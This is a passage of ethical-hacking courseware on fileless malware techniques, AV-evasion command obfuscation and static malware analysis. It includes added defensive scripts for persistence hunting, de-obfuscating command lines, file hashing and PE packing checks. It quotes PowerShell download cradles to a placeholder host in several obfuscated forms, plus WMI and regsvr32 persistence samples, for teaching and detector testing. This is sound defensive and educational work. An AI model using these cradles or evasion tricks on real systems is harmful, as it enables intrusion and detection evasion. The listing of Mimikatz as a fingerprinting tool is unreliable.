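             "powershell.exe -nop -w hidden -ep bypass -enc QQBBAEEA"),  # base64 is constructed
    Artifact("wmi", r"root\subscription CommandLineEventConsumer 'SysCheck'",
             "cmd.exe /c powershell.exe -NoExit -exec bypass -nop Invoke-Expression "
             "(New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')"),
    Artifact("task", r"\Microsoft\Windows\Defrag\ScheduledDefrag",
             r"%windir%\system32\defrag.exe -c -h -k -g -$"),
    Artifact("task", r"\OfficeUpdate", r"regsvr32.exe /s C:\Users\Public\update.dll"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_ARTIFACTS):
        print(f"[{finding.artifact.source}] {finding.artifact.location}")
        for reason in finding.reasons:
            print("    -", reason)
```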
Achieving Objectives

By maintaining persistence, attackers bypass security solutions and achieve a variety of objectives, such as data exfiltration, credential stealing, reconnaissance, and cyber spying, on the target systems and network.
Launching Fileless Malware through Document Exploits and In-Memory Exploits

A malicious document can be launched through the following steps:
= The victim is tricked into downloading/running a malicious document
= The document runs a malicious macro
= The malicious macro launches VBA or JavaScript
= The malicious script exploits PowerShell to run additional code (payload) to spread the infection to other running processes or systems
Figure 7.60: Launching Fileless Malware through Document Exploits
Launching Fileless Malware through In-Memory Exploits

Attackers can inject malicious payload inside the running memory (RAM) that targets legitimate processes without leaving any footprints. Such intrusion is extremely difficult to be detected by any antivirus software, as the payload is not stored in local disks but is directly executed from memory. Attackers exploit different APIs or Windows admin tools such as Windows Management Instrumentation (WMI), PsExec, and PowerShell to gain access to the process memory of a legitimate process. Attackers employ a reflective Dynamic Link Library (DLL) method to load a malicious script into a host-side process that resists the writing of DLLs to the disk.

EternalBlue is a type of in-memory exploit that can leverage the flaws in the Windows file sharing protocol known as Server Message Block (SMB 1). This client-server communication protocol (SMB 1) allows an attacker to read and access services, applications, etc. The attacker then targets the local security authority subsystem service (lsass.exe) file, injecting malicious code. The file (lsass.exe) is designed to handle login-logout, validating user credentials, and it also performs other critical operations. The attacker exploits this file to launch further attacks while evading security using tools such as Mimikatz to access the details from memory.
Figure 7.61: Delivering payloads using in-memory exploits
Launching Fileless Malware through Script-based Injection

Fileless attacks are also performed using scripts in which the binaries and shellcodes are embedded, obfuscated, and compiled to avoid writing a file on the disk. Scripts allow attackers to communicate with and infect the applications or operating systems without being traced.

Figure: Launching fileless malware through script-based injection (embedded code is placed in process memory; downloaded code is executed directly from memory)
Launching Fileless Malware by Exploiting System Admin Tools

Attackers exploit default system admin tools such as Certutil, WMI, and Regsvr32 to launch fileless infections. Attackers use Certutil and the Windows Management Instrumentation (WMI) command-line interface to launch fileless infections. They also exploit commands and tools such as Regsvr32 and rundll32 to run malicious DLLs.

Figure 7.63: Launching fileless malware by abusing sysadmin tools
Launching Fileless Malware through Phishing

Fileless malware exploits vulnerabilities in system tools to load and run malicious payloads on the victim's system. The steps followed by the attacker to launch fileless malware through phishing are as follows:

Figure 7.68: Launching a fileless malware through phishing

= The attacker sends a phishing email to the victim, embedded with a malicious link
= When the victim opens the email and clicks on the malicious link, the victim is automatically redirected to a fake website
= The fake website scans for vulnerabilities in the system, such as outdated Flash, to trigger the exploit
= Now, the fileless malware exploits system tools such as PowerShell to load and run the malicious payloads in memory. PowerShell downloads the malicious payloads from a remote command-and-control server
= The AutoStart registry key is created for storing the malicious script in the victim's system to maintain persistence
= Once the malicious payload is injected, it steals critical information, performs data exfiltration, and sends all the data to the attacker
Maintaining Persistence with Fileless Techniques

Compared to other malware types, fileless malware does not use disk files to spread its infection; attackers adopt unique methods such as developing load points to restart infected payloads to maintain persistence. Attackers save the malicious payload inside the registry, which holds configuration data for application files.

Figure 7.65: Maintaining persistence with fileless techniques
Fileless Malware

= Divergent
Divergent is a type of fileless malware that exploits NodeJS, which is a program that executes JavaScript outside the browser. Using Divergent fileless malware, attackers generate revenue by targeting corporate networks through click-fraud attacks. It strongly depends on the registry for the execution and storage of configuration data. Furthermore, it employs a key in the registry to maintain persistence and exploits PowerShell to inject itself into the other processes on the infected machine. If the infected process is running with the required privileges, it exploits WMI to gather information related to antivirus software such as Windows Defender installed on the target system. If Windows Defender is installed on the target system, it automatically disables various components of Windows Defender and Windows Updates. After infecting the system, it bypasses UAC through CMSTP.exe (Microsoft Connection Manager Profile Installer) and steals critical information from the victim through URLs.
Figure 7.6: Screenshot of Divergent
Some additional fileless malware are as follows:
= Astaroth Backdoor
= Nodersok
= Vaporworm
= njRat Backdoor
= Sodinokibi Ransomware
= Kovter and Poweliks
= Dridex
= Hancitor/Chanitor
= Sorebrect Ransomware
Fileless Malware Obfuscation Techniques to Bypass Antivirus
The various obfuscation techniques used by fileless malware to bypass antivirus solutions are discussed below:

= Inserting Characters
Attackers insert special characters such as commas (,) and semicolons (;) between malicious commands and strings to make well-known commands more difficult to detect. These special characters are considered as whitespace characters in command-line arguments; hence, they are processed easily. Using this technique, attackers break malicious strings to evade parsing of malicious commands by signature-based solutions.

cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com') &&echo exit
= Inserting Parentheses
In general scenarios, parentheses are used to improve the readability of the code, group complex expressions, and split commands. When parentheses are used, variables of a code block are considered and evaluated just as a single-line command. Attackers exploit this feature to split and obfuscate malicious commands.

cmd.exe /c ((echo command1) && (echo command2))
= Inserting Caret Symbol
The caret symbol (^) is generally a reserved character used in shell commands for escaping. Attackers exploit this feature to escape malicious commands at execution time. For this purpose, they insert single or double caret symbols inside a malicious command.

C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com') &&echo exit

When the above command is executed, the first caret symbol is escaped:

C:\WINDOWS\system32\cmd.exe /c p^o^w^e^r^s^h^e^l^l^.^e^x^e -No^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com') &&echo exit

After the second caret symbol is also escaped, powershell.exe is executed with a command-line argument:

C:\WINDOWS\system32\cmd.exe /c powershell.exe -NoExit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com') &&echo exit
= Inserting Double Quotes
When a command is embedded with double quotes, it does not affect the normal execution of the command. Furthermore, the command-line parser uses a double quote symbol as an argument delimiter. Attackers use double quote symbols to concatenate malicious commands in arguments.

Pow""er""Shell -N""oExit -ExecutionPolicy bypass -noprofile -
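A defender's counterpart to the four tricks above: the following script, added as an example and not code from the EC-Council courseware, undoes the inserted separators, parentheses, caret escapes and double quotes so that a plain signature for the powershell.exe download cradle matches again, and shows which signatures miss on the raw command line. The three command lines are constructed after the module's own examples and use its targetwebsite.com placeholder.

```python
"""Normalize cmd.exe command lines obfuscated with the four tricks above
(inserted , and ;, parentheses, caret escapes, double quotes) so that a plain
signature for the PowerShell download cradle matches again.

Added example, not code from the EC-Council courseware. The three command
lines are constructed after the module's own examples; targetwebsite.com is
the module's placeholder host."""
import re
from typing import List

# Signatures written against the normalized (lower-cased, de-obfuscated) form.
SIGNATURES = [
    ("cmd.exe spawns powershell", r"cmd\.exe /c .*\bpowershell"),
    ("powershell launched", r"\bpowershell(\.exe)?\b"),
    ("execution policy bypass", r"-(ep|ex|exec|executionpolicy)\s+bypass"),
    ("profile suppressed", r"-nop(rofile)?\b"),
    ("download cradle", r"downloadstring|invoke-expression"),
]


def unescape_carets(text: str) -> str:
    """cmd.exe turns ^x into x on each parse; ^^ survives one pass as ^ and is
    consumed on the next, so repeat until nothing changes (the module's
    two-stage caret example). Carets inside double quotes are literal in cmd;
    that edge case is ignored here because the quotes are stripped next anyway."""
    while True:
        unescaped = re.sub(r"\^(.)", r"\1", text)
        if unescaped == text:
            return text
        text = unescaped


def normalize(cmd: str) -> str:
    text = unescape_carets(cmd)
    text = text.replace('"', "")            # Pow""er""Shell -> PowerShell
    text = re.sub(r"[,;()&]+", " ", text)   # , ; ( ) & are separators, not content
    return " ".join(text.split()).lower()   # collapse whitespace, case-fold


def match_raw(cmd: str) -> List[str]:
    """What the signatures see without normalization (case-folded only)."""
    return [name for name, pat in SIGNATURES if re.search(pat, cmd.lower())]


def match_signatures(cmd: str) -> List[str]:
    """Signatures that fire once the obfuscation is undone."""
    norm = normalize(cmd)
    return [name for name, pat in SIGNATURES if re.search(pat, norm)]


# Constructed after the module's three obfuscated command lines.
INSERTED_CHARS = ("cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression "
                  "(New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com') &&echo exit")
CARETS = (r"C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass "
          r"-nop Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com') &&echo exit")
DOUBLE_QUOTES = ('Pow""er""Shell -N""oExit -ExecutionPolicy bypass -noprofile Invoke-Expression '
                 "(New-Object System.Net.WebClient).DownloadString('https://targetwebsite.com')")

if __name__ == "__main__":
    for label, cmd in (("inserted characters", INSERTED_CHARS),
                       ("caret escapes", CARETS),
                       ("double quotes", DOUBLE_QUOTES)):
        print(f"{label}:")
        print("  normalized :", normalize(cmd))
        print("  raw hits   :", match_raw(cmd))
        print("  after norm :", match_signatures(cmd))
```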
Malware Analysis
Malware is a program designed to perform malicious activities (the term itself is a contraction of "malicious software"). Malware such as viruses, Trojans, worms, spyware, and rootkits allow an attacker to breach security defenses and subsequently launch attacks on target systems. Thus, to find and fix existing infections and thwart future attacks, it is necessary to perform malware analysis. Many tools and techniques are available to perform such tasks. This section explains the malware analysis procedure and discusses the various tools used to accomplish it.
What is Sheep Dip Computer?

Sheep dipping is a process used in sheep farming, whereby sheep are dipped in chemical solutions to make them parasite-free. In information security and malware analysis, sheep dipping refers to the analysis of suspicious files, incoming messages, etc., for malware. The users isolate the sheep-dipped computer from other computers on the network to block any malware from entering the system. Before performing this process, it is important to save all downloaded programs on external media such as CD-ROMs or DVDs.

A computer used for sheep dipping should have tools such as port monitors, file monitors, network monitors, and one or more antivirus programs for performing malware analysis of files, applications, incoming messages, external hardware devices (such as USB and pen drive), and so on.

Some tasks that are typically run during the sheep dipping process are as follows:
= Run user, group permission, and process monitors
= Run port and network monitors
= Run device driver and file monitors
= Run registry and kernel monitors
Antivirus Sensor Systems

An antivirus sensor system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. It is used along with sheep dip computers.

Figure 7.67: Screenshot displaying the working of Antivirus Sensor System
Introduction to Malware Analysis

The main objectives of malware analysis are as follows:
= Determine what exactly happened
= Determine the malicious intent of the malware
= Identify the indicators of compromise
= List the indicators of compromise for different machines and different malware programs
= Find the system vulnerability that the malware has exploited
= Distinguish the gatecrasher or insider responsible for the malware entry

The most common business questions answered by malware analysis are as follows:
= What is the intention of the malware?
= How did it get through?
= What is its impact on the business?
= Who are the perpetrators, and how good are they?
= How to abolish the malware?
= What is the medium of the malware?
= What are the preventive measures?

Guidelines for Malware Analysis

The following guidelines are to be adopted while performing malware analysis:
= During malware analysis, pay attention to the essential features instead of understanding every detail
= Try different tools and approaches to analyze the malware, as a single approach may not be useful
= Identify, understand, and defeat new malware analysis prevention techniques

Types of Malware Analysis
= Dynamic Malware Analysis
It is also known as behavioral analysis, and it involves executing the malware code to know how it interacts with the host system as well as its impact on the host system after it infects the system. Dynamic analysis involves the execution of malware to examine its conduct and operations, and it identifies technical signatures that confirm the malicious intent. It reveals information such as domain names, file path locations, created registry keys, IP addresses, additional files, installation files, DLL, and linked files located on the system or network.

Both techniques aim to understand how the malware works, but they differ in terms of the tools used as well as the time and skills required for performing the analysis. It is recommended that both static and dynamic analyses be performed to gain a deeper understanding of the functionality of malware.
Malware Analysis Procedure

Malware analysis provides an in-depth understanding of each sample and identifies emerging technology trends from a vast collection of malware samples without actually executing them. The malware samples are mostly compatible with the Windows binary executable. There are various objectives for performing malware analysis. It is extremely dangerous to analyze malware on production devices connected to production networks. Therefore, one should always analyze malware samples in a testing environment on an isolated network.

Malware analysis involves the following steps:
1. Preparing Testbed
2. Static Analysis
3. Dynamic Analysis

Preparing Testbed

Requirements to build a testbed:
= An isolated test network to host your testbed and isolated network services such as DNS
= Target machines installed with a variety of OS and configuration states (non-patched, patched, etc.)
= Virtualization snapshots and re-imaging tools to wipe and rebuild the target machine quickly

Some tools are required for testing. The important ones are listed below:
= Imaging tool: To get a clean image for forensics and prosecution purposes.
= File/data analysis: To perform static analysis of potential malware files.
= Registry/configuration tools: Malware infects the Windows registry and other configuration variables. These tools help to identify the last saved settings.
= Sandbox: To perform dynamic analysis manually.
= Log analyzers: The devices under attack record the activities of the malware and generate log files. These tools are used to extract the log files.
= Network capture: To understand how the malware leverages the network

Steps to prepare the testbed:
= Step 1: Allocate a physical system for the analysis lab
= Step 2: Install a virtual machine (VMware, Hyper-V, etc.) on the system
= Step 3: Install guest OS on the virtual machine(s)
= Step 4: Isolate the system from the network by ensuring that the NIC card is in the "host only" mode
= Step 5: Simulate Internet services using tools such as INetSim (https://www.inetsim.org)
= Step 6: Disable "shared folders" and "guest isolation"
= Step 7: Install malware analysis tools
= Step 8: Generate the hash value of each OS and tool
= Step 9: Copy the malware to the guest OS
Supporting Tools for Malware Analysis:

Some supporting tools required to perform malware analysis are as follows:

Virtual Machine Tools:
= Hyper-V (https://docs.microso&#8203;ft.com)
= Parallels Desktop 14 (https://www.parallels.com)
= Boot Camp (https://www.apple.com)
= VMware Workstation Pro (https://www.vmware.com)

Screen Capture and Recording Tools:
= Snagit (https://www.techsmith.com)
= Jing (https://www.techsmith.com)
= Camtasia (https://www.techsmith.com)
= Ezvid (https://www.ezvid.com)
Network and Internet Simulation Tools:
= NetSim Pro (https://tetcos.com)
= ns-3 (https://www.nsnam.org)
= Riverbed Modeler (http://www.riverbed.com)
= QualNet (http://web.scalable-networks.com)

Backup and Imaging Tools:
= Genie Backup Manager Pro (https://www.zoolz.com)
= Macrium Reflect Server (https://www.macrium.com)
= R-Drive Image (https://www.drive-image.com)
= O&O DiskImage 14 (https://www.oo-software.com)
Static Malware Analysis

Static analysis is the process of investigating an executable file without running or installing it. Thus, it is safe to conduct static analysis because the investigator does not install or execute the suspicious file. However, some malware does not need installation for performing malicious activities. Therefore, investigators should perform static analysis in a controlled environment.

Static analysis involves accessing the source code or binary code to find the data structures, function calls, call graphs, etc., that can represent malicious behavior. Investigators can use various tools to analyze binary code to understand the file architecture and impact on the system. Compiling the source code of a system into a binary executable results in data loss, which makes the analysis of the code more difficult. Analyzing the binary code provides information about the malware functionality, its network signatures, exploit packaging technique, dependencies involved, etc.

The procedure of examining a given binary without executing it is mostly manual. It requires the extraction of vital data, such as data structures, utilized functions, and call graphs, from the malicious file. This data cannot be viewed by the investigator after program compilation.

Some static malware analysis techniques are listed below:
= File fingerprinting
= Local and online malware scanning
= Performing strings search
= Identifying packing/obfuscation methods
= Finding the portable executables (PE) information
= Identifying file dependencies
= Malware disassembly
File Fingerprinting

File fingerprinting is a process of computing the hash value for a given binary code to identify and track data across a network. This process includes the calculation of cryptographic hashes of the binary code to recognize its function and compare it with other binary code and programs from previous scenarios. The computed hash value can be used to uniquely identify the malware or periodically verify if any changes are made to the binary code during analysis. These fingerprints are used to track and identify similar programs from a database. Fingerprinting does not work for certain record types, including encrypted or password-secured files, images, audio, and video, which have different content compared to the predefined fingerprint.

Message-Digest Algorithm 5 (MD5) and Secure Hash Algorithm 1 (SHA-1) are the most commonly used hash functions for malware analysis. Various GUI-based tools such as HashMyFiles can be used to create a fingerprint of the suspicious file as part of the static analysis. HashMyFiles is a tool that can calculate various hash values.

= HashMyFiles
Source: https://www.nirsoft.net
HashMyFiles produces a hash value for a file using MD5, SHA1, CRC32, SHA-256, SHA-512, and SHA-384 algorithms. The program also provides information about the file, such as the full path of the file, date of creation, date of modification, file size, file attributes, file version, and extension, which helps in searching for and comparing similar files.
Figure 7.58: Screenshot of HashMyFiles

Some additional file fingerprinting tools are as follows:

▪ Mimikatz (https://github.com)
▪ Hashtab (http://implbits.com)
▪ HashCalc (https://www.slavasoft.com)
▪ hashdeep (https://github.com)
▪ md5sums (http://www.pc-tools.net)
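The fingerprinting step described above, written out as an added example (this is not code from the courseware or from any of the tools it lists). It computes the same digest set HashMyFiles reports with the Python standard library, hashes a file in chunks so that large samples do not have to be read into memory, and re-checks a recorded fingerprint to confirm the sample has not changed during analysis. The input bytes and the temporary file are constructed for the example.

```python
import hashlib
import os
import tempfile
import zlib

# Constructed stand-in for a suspicious binary; not a real sample.
SAMPLE_BINARY = b"abc"

# The algorithms HashMyFiles reports; hashlib provides all of them, CRC32 comes from zlib.
ALGORITHMS = ("md5", "sha1", "sha256", "sha384", "sha512")


def fingerprint(data: bytes) -> dict:
    """Compute every fingerprint for an in-memory blob."""
    digests = {name: hashlib.new(name, data).hexdigest() for name in ALGORITHMS}
    digests["crc32"] = f"{zlib.crc32(data) & 0xFFFFFFFF:08x}"
    return digests


def fingerprint_file(path: str, chunk_size: int = 1 << 20) -> dict:
    """Hash a file on disk in chunks so large samples never have to fit in memory."""
    hashers = {name: hashlib.new(name) for name in ALGORITHMS}
    crc = 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
            crc = zlib.crc32(chunk, crc)
    digests = {name: h.hexdigest() for name, h in hashers.items()}
    digests["crc32"] = f"{crc & 0xFFFFFFFF:08x}"
    return digests


def verify_unchanged(data: bytes, recorded: dict) -> bool:
    """Re-hash the sample and compare with the fingerprint recorded at the start of analysis.
    Every algorithm must match: a single differing digest means the file changed."""
    current = fingerprint(data)
    return all(current[name] == value for name, value in recorded.items())


def file_and_memory_agree(data: bytes = SAMPLE_BINARY) -> bool:
    """Write the blob to a temporary file and check that both code paths give the same fingerprint."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        return fingerprint_file(path) == fingerprint(data)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    baseline = fingerprint(SAMPLE_BINARY)
    for name, value in baseline.items():
        print(f"{name:7} {value}")
    print("unchanged:", verify_unchanged(SAMPLE_BINARY, baseline))
    print("tampered :", verify_unchanged(SAMPLE_BINARY + b"\x90", baseline))
```

Record the SHA-256 alongside MD5 and SHA-1: the older two are still what most malware databases are keyed on, but both have known collision attacks, so use SHA-256 as the value that establishes a sample's identity in your own notes.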
Static Malware Analysis: Local and Online Malware Scanning

▪ Scan the binary code locally with well-known and up-to-date antivirus software
▪ You can also upload the code to online websites such as VirusTotal to get it scanned by a wide variety of scan engines
Local and Online Malware Scanning

You can scan the binary code locally using well-known and up-to-date antivirus software. If the code under analysis is a component of a well-known malware, it may have already been discovered and documented by many antivirus vendors. You can also upload the code to websites such as VirusTotal to get it scanned by a wide variety of scan engines. Files uploaded to VirusTotal are shared with its partner vendors, so search for the file's hash first and upload a sensitive sample only when that search returns nothing.

VirusTotal calculates the hash values of a suspicious file and compares them with online and offline malware databases to determine the existence of the recognized malicious code. This process simplifies further investigation by offering deeper insights into the code, its functionality, and other essential details.

▪ VirusTotal

Source: https://www.virustotal.com

VirusTotal is a free service that analyzes suspicious files and URLs. In addition, it facilitates the detection of viruses, worms, Trojans, etc. It generates a report that provides the total number of engines that marked the file as malicious, the malware name, and, if available, additional information about the malware. It also offers important details of the online file analysis, such as target machine, compilation timestamp, type of file, compatible processors, entry point, PE sections, dynamic-link libraries (DLLs), used PE resources, different hash values, IP addresses accessed or contained in the file, program code, and type of connections established.

Figure 7.69: Screenshot of VirusTotal

Some additional local and online malware scanning tools are as follows:

▪ Hybrid Analysis (https://www.hybrid-analysis.com)
▪ Cuckoo Sandbox (https://cuckoosandbox.org)
▪ Jotti (https://virusscan.jotti.org)
▪ Valkyrie Sandbox (https://valkyrie.comodo.com)
▪ Online Scanner (https://www.fortiguard.com)
Static Malware Analysis: Performing Strings Search

▪ Use tools such as BinText to extract embedded strings from executable files

Performing Strings Search
Software programs include some strings that are commands for performing specific functions such as printing output. Strings communicate information from the program to its user. Various existing strings embedded in the compiled binary code can represent the malicious intent of a program, such as reading the internal memory or cookie data. Searching through the strings can provide information about the basic functionality of any program. During malware analysis, search for the malicious string to determine the harmful actions that a program can perform. For instance, if the program accesses a URL, it will have that particular URL string stored in it. It is advisable to be alert while looking for strings and also search for the embedded and encrypted strings to detect the suspicious file.

Use tools such as BinText to extract embedded strings from executable files. Ensure that the tool can scan and display ASCII and Unicode strings as well. Some tools can extract all the strings and copy them to a text or document file. Use such tools to copy the strings to a text file to ease the task of searching for malicious strings.

▪ BinText

Source: https://www.aldeid.com

BinText is a text extractor that can extract text from any file. It can find plain ASCII text, Unicode text, and resource strings, providing useful information for each item.
Figure 7.70: Screenshot of BinText

Some additional string searching tools are as follows:

▪ FLOSS (https://www.fireeye.com)
▪ Strings (https://docs.microsoft.com)
▪ Free EXE DLL Resource Extract (http://www.resourceextract.com)
▪ FileSeek (https://www.fileseek.ca)
▪ Hex Workshop (http://www.hexworkshop.com)
Static Malware Analysis: Identifying Packing/Obfuscation Methods

▪ Attackers often use packers to compress, encrypt, or modify a malware executable file to avoid detection
▪ The PEiD tool provides details about the Windows executable file; it can identify signatures associated with over 600 different packers and compilers
▪ Packaging/obfuscation tools: Macro_Pack (https://github.com), UPX (https://upx.github.io), ASPack (http://www.aspack.com)

Identifying Packing/Obfuscation Methods
Attackers use packing and obfuscation to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file and then run the unpacked file. This complicates reverse engineers' attempts to find out the actual program logic and other metadata via static analysis.

You should try to determine if the file includes packed elements and also locate the tool or method used for packing it. Use tools such as PEiD, which detects most commonly used packers, cryptors, and compilers for PE executable files. Finding the packer will ease the task of selecting a tool for unpacking the code.

▪ PEiD

Source: https://www.aldeid.com

PEiD is a free tool that provides details about Windows executable files. It can identify signatures associated with over 600 different packers and compilers. This tool also displays the type of packers used for packing the program. It also displays additional details such as entry point, file offset, EP section, and subsystem.
Figure: Screenshot of PEiD

Some additional packaging/obfuscation tools are as follows:

▪ Macro_Pack (https://github.com)
▪ UPX (https://upx.github.io)
▪ ASPack (http://www.aspack.com)
Static Malware Analysis: Finding the Portable Executables (PE) Information

▪ PE extraction tools: PE Explorer, Portable Executable Scanner (pescan)

Finding the Portable Executables (PE) Information
The Portable Executable (PE) format is an executable file format used on Windows OS, which stores the information that a Windows system requires to manage the executable code. It stores metadata about the program, which helps in finding additional details of the file. For instance, the Windows binary is in PE format, and it consists of information such as time of creation and modification, import and export functions, compilation time, DLLs, linked files, strings, menus, and symbols. The PE format contains a header and sections that store metadata about the file and the mapping of the code in the file to instructions in the OS.

The PE file contains the following sections:

▪ .text: Contains instructions and program code that the CPU executes.
▪ .rdata: Contains import and export information as well as other read-only data used by the program.
▪ .data: Contains the program's global data, which the system can access from anywhere.

A further section offers additional details of a file or program, such as its strings, menus, and multi-lingual support features, which you can gather using the header information.

You can use tools such as PEView to extract the above-mentioned information.

▪ PE Explorer

Source: http://www.heaventools.com

PE Explorer lets you open, view, and edit a variety of 32-bit Windows executable file types (also called PE files) ranging from common types, such as EXE, DLL, and ActiveX Controls, to less familiar types, such as SCR (Screensavers), CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL, and more (including executable files that run on the MS Windows Mobile platform).

Figure 7.72: Screenshot of PE Explorer

Some additional PE extraction tools are as follows:

▪ Portable Executable Scanner (pescan) (https://tzworks.net)
▪ Resource Hacker (http://www.angusj.com)
▪ PEView (https://www.aldeid.com)
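The two preceding topics, reading the PE header and section table and spotting packing, share one added example below (it is not code from the courseware, PEiD, or PE Explorer). The parser reads the DOS header, PE signature, COFF header, the entry point and subsystem from the optional header, and the section table, computing each section's Shannon entropy. The packing heuristics it applies are the ones a PEiD signature miss leaves you with: packer section names, a section with near-maximum entropy, a section that is empty on disk but large in memory, and an entry point outside .text. Because no real sample can be shipped with the example, `build_pe()` assembles two tiny synthetic PE32 images (one plain, one shaped like UPX output); they are constructed for the test and are not runnable programs.

```python
import math
import struct
from collections import Counter

# Section names that well-known packers leave behind (UPX, ASPack).
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata"}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: about 8.0 for compressed or encrypted data, 3-6 for code."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Read the DOS header, PE signature, COFF header, a few optional-header fields and the section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]           # 0x10B = PE32, 0x20B = PE32+
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]  # AddressOfEntryPoint
    subsystem = struct.unpack_from("<H", image, opt + 68)[0]  # 2 = GUI, 3 = console
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        raw = image[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "entropy": entropy(raw)})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"])), None)
    return {"machine": machine, "timestamp": timestamp, "magic": magic, "subsystem": subsystem,
            "entry_point": entry_rva, "entry_section": entry_section, "sections": sections}


def packing_indicators(info: dict) -> list:
    """Heuristics that complement PEiD-style signature matching: names, entropy, empty sections, EP."""
    hits = []
    for s in info["sections"]:
        if s["name"] in KNOWN_PACKER_SECTIONS:
            hits.append(f"packer section name {s['name']}")
        if s["raw_size"] and s["entropy"] > 7.0:
            hits.append(f"high entropy {s['entropy']:.2f} in {s['name']}")
        if s["raw_size"] == 0 and s["vsize"] >= 0x1000:
            hits.append(f"{s['name']} is empty on disk but {s['vsize']:#x} bytes in memory (unpacking target)")
    if info["entry_section"] not in (".text", "CODE"):
        hits.append(f"entry point {info['entry_point']:#x} lies in {info['entry_section']}")
    return hits


def build_pe(sections, entry_rva, file_align=0x200) -> bytes:
    """Assemble a minimal PE32 image for exercising the parser (constructed; not a runnable program).
    `sections` is a list of (name, virtual_address, virtual_size, raw_data)."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000, 0x400000)
    opt += struct.pack("<II", 0x1000, file_align)                         # SectionAlignment, FileAlignment
    opt += struct.pack("<HHHHHH", 6, 0, 0, 0, 6, 0)                        # OS / image / subsystem versions
    opt += struct.pack("<IIII", 0, 0x4000, file_align, 0)                  # Win32Version, SizeOfImage, SizeOfHeaders, CheckSum
    opt += struct.pack("<HH", 2, 0)                                        # Subsystem = 2 (GUI), DllCharacteristics
    opt = opt.ljust(224, b"\x00")
    table, body, raw_ptr = b"", b"", file_align
    for name, va, vsize, data in sections:
        padded = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                             vsize, va, len(data), raw_ptr if data else 0, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(padded, b"\x00")
        raw_ptr += padded
    head = dos + b"PE\x00\x00" + coff + opt + table
    assert len(head) <= file_align, "too many sections for one header page"
    return head.ljust(file_align, b"\x00") + body


LOW_ENTROPY_CODE = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\x5d\xc3" * 40   # repetitive x86-looking bytes
HIGH_ENTROPY_BLOB = bytes(range(256)) * 2                           # uniform byte distribution: exactly 8.0 bits
NORMAL_PE = build_pe([(".text", 0x1000, len(LOW_ENTROPY_CODE), LOW_ENTROPY_CODE),
                      (".rdata", 0x2000, 0x40, b"kernel32.dll\x00GetProcAddress\x00".ljust(0x40, b"\x00"))],
                     entry_rva=0x1000)
PACKED_PE = build_pe([("UPX0", 0x1000, 0x1000, b""),
                      ("UPX1", 0x2000, 0x1000, HIGH_ENTROPY_BLOB)], entry_rva=0x2010)

if __name__ == "__main__":
    for label, image in (("normal", NORMAL_PE), ("packed", PACKED_PE)):
        info = parse_pe(image)
        print(label, f"entry={info['entry_point']:#x} in {info['entry_section']} subsystem={info['subsystem']}")
        for s in info["sections"]:
            print(f"  {s['name']:8} va={s['va']:#07x} raw={s['raw_size']:#06x} entropy={s['entropy']:.2f}")
        print("  indicators:", packing_indicators(info) or "none")
```

On a real file, `parse_pe(open(path, "rb").read())` gives the same structure PEView shows; a high-entropy section is only a hint, since legitimate installers embed compressed payloads too, so treat the indicator list as a reason to run PEiD or try UPX's `-d` rather than as a verdict.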
Static Malware Analysis: Identifying File Dependencies

▪ Programs need to work with internal system files to function properly; check the dynamically linked list in the malware executable file
▪ Dependency Walker lists all the dependent modules of an executable file and builds hierarchical tree diagrams; it also records all the functions of each module's exports
▪ Dependency checking tools: Dependency Walker (http://www.dependencywalker.com), Dependency-check (https://jeremylong.github.io)

